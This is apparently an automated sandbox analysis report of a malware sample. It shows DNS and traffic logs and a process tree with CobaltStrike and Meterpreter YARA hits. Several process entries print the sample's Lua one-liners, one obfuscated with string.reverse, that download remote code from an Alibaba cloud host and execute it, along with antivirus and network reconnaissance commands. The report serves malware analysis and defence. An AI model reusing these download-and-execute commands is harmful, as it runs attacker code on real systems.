Jul 12, 2021 10:29:53.532965899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.532975912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.533011913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.533015966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:53.533036947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:53.533081055 CEST	80	49755	47.254.186.176	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 12, 2021 10:28:44.327363968 CEST	192.168.2.3	8.8.8.8	0x39d	Standard query (0)	softres.oss-accelerate.aliyuncs.com	A (IP address)	IN (0x0001)
Jul 12, 2021 10:28:45.089160919 CEST	192.168.2.3	8.8.8.8	0x1151	Standard query (0)	lualibs.oss-cn-hongkong.aliyuncs.com	A (IP address)	IN (0x0001)
Jul 12, 2021 10:28:45.332375050 CEST	192.168.2.3	8.8.8.8	0x39d	Standard query (0)	softres.oss-accelerate.aliyuncs.com	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:01.843852043 CEST	192.168.2.3	8.8.8.8	0x3b42	Standard query (0)	g.msn.com	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:34.403619051 CEST	192.168.2.3	8.8.8.8	0x8367	Standard query (0)	lualibs.oss-cn-hongkong.aliyuncs.com	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:35.331733942 CEST	192.168.2.3	8.8.8.8	0x9642	Standard query (0)	lualibs.oss-accelerate.aliyuncs.com	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:44.190829992 CEST	192.168.2.3	8.8.8.8	0x938b	Standard query (0)	softres.oss-accelerate.aliyuncs.com	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:45.221247911 CEST	192.168.2.3	8.8.8.8	0x938b	Standard query (0)	softres.oss-accelerate.aliyuncs.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 12, 2021 10:28:45.420475006 CEST	8.8.8.8	192.168.2.3	0x1151	No error (0)	lualibs.oss-cn-hongkong.aliyuncs.com		47.75.19.154	A (IP address)	IN (0x0001)
Jul 12, 2021 10:28:45.600143909 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	softres.oss-accelerate.aliyuncs.com	oss-acc-allline.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:28:45.600143909 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	oss-acc-allline.aliyuncs.com	oss-acc-allline.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:28:45.600143909 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	oss-acc-allline.aliyuncs.com.gds.alibabadns.com	eu-central-1.oss-acc.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:28:45.600143909 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.176	A (IP address)	IN (0x0001)
Jul 12, 2021 10:28:45.600143909 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.154	A (IP address)	IN (0x0001)
Jul 12, 2021 10:28:46.439572096 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	softres.oss-accelerate.aliyuncs.com	oss-acc-allline.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:28:46.439572096 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	oss-acc-allline.aliyuncs.com	oss-acc-allline.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:28:46.439572096 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	oss-acc-allline.aliyuncs.com.gds.alibabadns.com	eu-central-1.oss-acc.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:28:46.439572096 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.176	A (IP address)	IN (0x0001)
Jul 12, 2021 10:28:46.439572096 CEST	8.8.8.8	192.168.2.3	0x39d	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.154	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:01.877118111 CEST	8.8.8.8	192.168.2.3	0x3b42	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:34.418407917 CEST	8.8.8.8	192.168.2.3	0x8367	No error (0)	lualibs.oss-cn-hongkong.aliyuncs.com		47.75.19.154	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:35.496001005 CEST	8.8.8.8	192.168.2.3	0x9642	No error (0)	lualibs.oss-accelerate.aliyuncs.com	oss-acc-allline.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:35.496001005 CEST	8.8.8.8	192.168.2.3	0x9642	No error (0)	oss-acc-allline.aliyuncs.com	oss-acc-allline.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:35.496001005 CEST	8.8.8.8	192.168.2.3	0x9642	No error (0)	oss-acc-allline.aliyuncs.com.gds.alibabadns.com	eu-central-1.oss-acc.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:35.496001005 CEST	8.8.8.8	192.168.2.3	0x9642	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.176	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:35.496001005 CEST	8.8.8.8	192.168.2.3	0x9642	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.154	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:45.294502974 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	softres.oss-accelerate.aliyuncs.com	oss-acc-allline.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:45.294502974 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	oss-acc-allline.aliyuncs.com	oss-acc-allline.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:45.294502974 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	oss-acc-allline.aliyuncs.com.gds.alibabadns.com	eu-central-1.oss-acc.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:45.294502974 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.176	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:45.294502974 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.154	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:46.361982107 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	softres.oss-accelerate.aliyuncs.com	oss-acc-allline.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:46.361982107 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	oss-acc-allline.aliyuncs.com	oss-acc-allline.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:46.361982107 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	oss-acc-allline.aliyuncs.com.gds.alibabadns.com	eu-central-1.oss-acc.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)
Jul 12, 2021 10:29:46.361982107 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.176	A (IP address)	IN (0x0001)
Jul 12, 2021 10:29:46.361982107 CEST	8.8.8.8	192.168.2.3	0x938b	No error (0)	eu-central-1.oss-acc.aliyuncs.com		47.254.186.154	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

softres.oss-accelerate.aliyuncs.com

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WhQZ6UbCEY.exe PID: 2328 Parent PID: 5784

General

Start time:	10:28:42
Start date:	12/07/2021
Path:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\WhQZ6UbCEY.exe'
Imagebase:	0x7ff7bf670000
File size:	2189056 bytes
MD5 hash:	76DE16ED705561AD6FF55FD578660C91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: luac.exe PID: 1384 Parent PID: 528

General

Start time:	10:28:43
Start date:	12/07/2021
Path:	C:\ProgramData\lua\luac.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\lua\luac.exe -e 'code = \'local http=require('socket.http');\'..\'local response_body = {}\'..\'local res, code = http.request({\'..\' url = string.reverse('aul.344-SC-1/68x/moc.scnuyila.gnokgnoh-nc-sso.sbilaul//:ptth'),\'..\' sink = ltn12.sink.table(response_body)\'..\'})\'..\'if type(response_body) == 'table' then\'..\' loadstring(table.concat(response_body))()\'..\'else\'..\' print('error')\'..\'end\';loadstring(code)();'
Imagebase:	0x400000
File size:	35840 bytes
MD5 hash:	B747D97542F2E512AB640D0A67D5DA91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.482412566.000000000048A000.00000004.00000020.sdmp, Author: Avast Threat Intel Team Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.482412566.000000000048A000.00000004.00000020.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.487308738.0000000000A50000.00000040.00000001.sdmp, Author: Avast Threat Intel Team Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.487308738.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, Author: netbiosX, Florian Roth Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, Author: yara@s3c.za.net Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, Author: yara@s3c.za.net Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, Author: Joe Security Rule: CobaltStrike_C2_Decoded_Config_Indicator, Description: Detects CobaltStrike C2 decoded profile configuration, Source: 00000003.00000002.492478828.0000000001FA0000.00000004.00000040.sdmp, Author: yara@s3c.za.net Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.486483728.00000000008EC000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.486483728.00000000008EC000.00000004.00000001.sdmp, Author: Joe Security Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, Author: netbiosX, Florian Roth Rule: Cobaltbaltstrike_Beacon_x86, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, Author: Avast Threat Intel Team Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, Author: yara@s3c.za.net Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, Author: yara@s3c.za.net Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 1268 Parent PID: 1384

General

Start time:	10:28:45
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5596 Parent PID: 1268

General

Start time:	10:28:46
Start date:	12/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Silverlight.exe PID: 2484 Parent PID: 528

General

Start time:	10:28:47
Start date:	12/07/2021
Path:	C:\Users\user\AppData\Roaming\Silverlight.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Silverlight.exe
Imagebase:	0x1000000
File size:	7023448 bytes
MD5 hash:	7BAEBABAB6F0CA7B143068FDC17DFA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 4712 Parent PID: 1268

General

Start time:	10:28:47
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	netstat -ano
Imagebase:	0x180000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: findstr.exe PID: 4280 Parent PID: 1268

General

Start time:	10:28:48
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr LISTEN
Imagebase:	0xf0000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: findstr.exe PID: 4020 Parent PID: 1268

General

Start time:	10:28:49
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr 127.0.0.1:
Imagebase:	0xf0000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: install.exe PID: 4064 Parent PID: 2484

General

Start time:	10:28:49
Start date:	12/07/2021
Path:	C:\5a70dbc53fcf0baade86ff\install.exe
Wow64 process (32bit):	true
Commandline:	c:\5a70dbc53fcf0baade86ff\install.exe
Imagebase:	0x1080000
File size:	230080 bytes
MD5 hash:	B8A93D5A9BCFC67393584CA0DE0D3FC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 2%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6188 Parent PID: 1384

General

Start time:	10:28:50
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6224 Parent PID: 6188

General

Start time:	10:28:50
Start date:	12/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 6260 Parent PID: 6188

General

Start time:	10:28:51
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	netstat -ano
Imagebase:	0x180000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: findstr.exe PID: 6284 Parent PID: 6188

General

Start time:	10:28:51
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr LISTEN
Imagebase:	0xf0000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: findstr.exe PID: 6308 Parent PID: 6188

General

Start time:	10:28:52
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr 127.0.0.1:
Imagebase:	0xf0000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6416 Parent PID: 1384

General

Start time:	10:28:59
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: microsoft_defaults.exe PID: 6452 Parent PID: 4064

General

Start time:	10:28:59
Start date:	12/07/2021
Path:	C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe
Wow64 process (32bit):	true
Commandline:	'C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe' dhp=true dsp=true
Imagebase:	0x220000
File size:	119968 bytes
MD5 hash:	64CADAEF6DCF7B6A6171FC1A2BEE94A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6524 Parent PID: 6416

General

Start time:	10:29:00
Start date:	12/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WMIC.exe PID: 6580 Parent PID: 6416

General

Start time:	10:29:01
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName
Imagebase:	0x60000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WMIC.exe PID: 6748 Parent PID: 6416

General

Start time:	10:29:05
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	WMIC os get caption
Imagebase:	0x60000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MSIE4C1.tmp PID: 6900 Parent PID: 1632

General

Start time:	10:29:08
Start date:	12/07/2021
Path:	C:\Windows\Installer\MSIE4C1.tmp
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Installer\MSIE4C1.tmp' flat
Imagebase:	0xc30000
File size:	68744 bytes
MD5 hash:	015F2D65BE1227973565EB9E3E9C631A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: ipconfig.exe PID: 6908 Parent PID: 6416

General

Start time:	10:29:09
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /all
Imagebase:	0x40000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: msiexec.exe PID: 6964 Parent PID: 1632

General

Start time:	10:29:11
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	c:\Windows\syswow64\MsiExec.exe -Embedding D8799928554D1158D35383D418369414
Imagebase:	0xcc0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 7044 Parent PID: 4064

General

Start time:	10:29:13
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\SLMSPRBootstrap.dll',SetupPlayReadyData
Imagebase:	0x9d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 7092 Parent PID: 1384

General

Start time:	10:29:14
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 7156 Parent PID: 7092

General

Start time:	10:29:21
Start date:	12/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: coregen.exe PID: 5844 Parent PID: 4064

General

Start time:	10:29:16
Start date:	12/07/2021
Path:	C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe' mscorlib.dll
Imagebase:	0x1020000
File size:	68744 bytes
MD5 hash:	3BF709AEDF5042C39515756FB72E9EC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 6088 Parent PID: 5844

General

Start time:	10:29:21
Start date:	12/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WMIC.exe PID: 6336 Parent PID: 7092

General

Start time:	10:29:24
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName
Imagebase:	0x60000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Silverlight.Configuration.exe PID: 4604 Parent PID: 4064

General

Start time:	10:29:23
Start date:	12/07/2021
Path:	C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\silverlight.configuration.exe' -enableMU
Imagebase:	0xcd0000
File size:	237192 bytes
MD5 hash:	17E40315660830AA625483BBF608730C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6484 Parent PID: 1384

General

Start time:	10:29:27
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /C %ProgramData%\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4772 Parent PID: 6484

General

Start time:	10:29:28
Start date:	12/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WMIC.exe PID: 6360 Parent PID: 7092

General

Start time:	10:29:30
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	WMIC os get caption
Imagebase:	0x60000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: lua.exe PID: 4652 Parent PID: 6484

General

Start time:	10:29:30
Start date:	12/07/2021
Path:	C:\ProgramData\lua\lua.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Imagebase:	0x7ff6883e0000
File size:	20480 bytes
MD5 hash:	847B0D65C80A8E777E8AA108295C0B95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6984 Parent PID: 4652

General

Start time:	10:29:37
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 7024 Parent PID: 6984

General

Start time:	10:29:38
Start date:	12/07/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	netstat -ano
Imagebase:	0x180000
File size:	32768 bytes
